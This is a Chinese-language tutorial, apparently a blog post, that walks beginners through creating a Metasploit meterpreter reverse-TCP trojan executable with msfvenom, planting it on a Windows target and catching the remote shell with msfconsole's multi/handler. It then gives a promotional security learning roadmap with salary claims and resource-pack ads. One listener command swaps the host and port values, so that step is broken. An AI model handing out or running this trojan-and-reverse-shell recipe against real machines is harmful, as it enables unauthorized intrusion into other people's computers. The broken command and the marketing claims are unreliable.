工具:一台带有kali linux系统的虚拟机,一个聪明的大脑
开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败
1.打开虚拟机,点击虚拟机
2.点击设置
3.点击网络适配器,看左边点击桥接模式,点击确定即可
好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?
1.打开虚拟机
2.打开终端,输入sudo su进入root用户权限
3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip
4.输入msfvenom -p windows/meterpreter/reverse_tcp lhost=“本机ip” lport=5000 -f exe
-o /root/payload.exe生成木马
显示以上信息表示生成成功,最后一行为木马路径,如果不是图片上的的显示信息,可能是写错了,检查一下
5.将木马程序从虚拟机中拖到靶机中
6.在终端中输入输入msfconsole
弹出以上信息表示打开成功
6.输入一下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 5000
set lport “本机ip”
然后输入exploit或者run开始远程监听
6.然后在靶机上双击打开木马exe程序,双以后可能靶机中没有任何的变化,但其实木马已经在运行并且已经在kali中反弹了shell,这表示我们已经成功的入侵了windows系统了
好啦,本期的教程就到这里了,大家在渗透的过程中有问题可以在下方留言,我会不定时的检查的哦
网络安全学习路线
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
或者扫描下方csdn官方合作二维码获取哦!
这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!
阶段一:基础入门
网络安全导论
渗透测试基础
网络基础
操作系统基础
Web安全基础
数据库基础
编程基础
CTF基础
该阶段学完年薪15w+没有问题
阶段二:技术进阶(到了这一步你才算入门)
弱口令与口令爆破
XSS漏洞
CSRF漏洞
SSRF漏洞
XXE漏洞
SQL注入
任意文件操作漏洞
业务逻辑漏洞
该阶段学完年薪25w+
阶段三:高阶提升
反序列化漏洞
RCE
综合靶场实操项目
内网渗透
流量分析
日志分析
恶意代码分析
应急响应
实战训练
该阶段学完即可年薪30w+
阶段四:蓝队课程
蓝队基础
蓝队进阶
该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。
攻防兼备,年薪收入可以达到40w+
阶段五:面试指南&阶段六:升级内容
需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容可在文章后方领取。
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
或者扫描下方csdn官方合作二维码获取哦!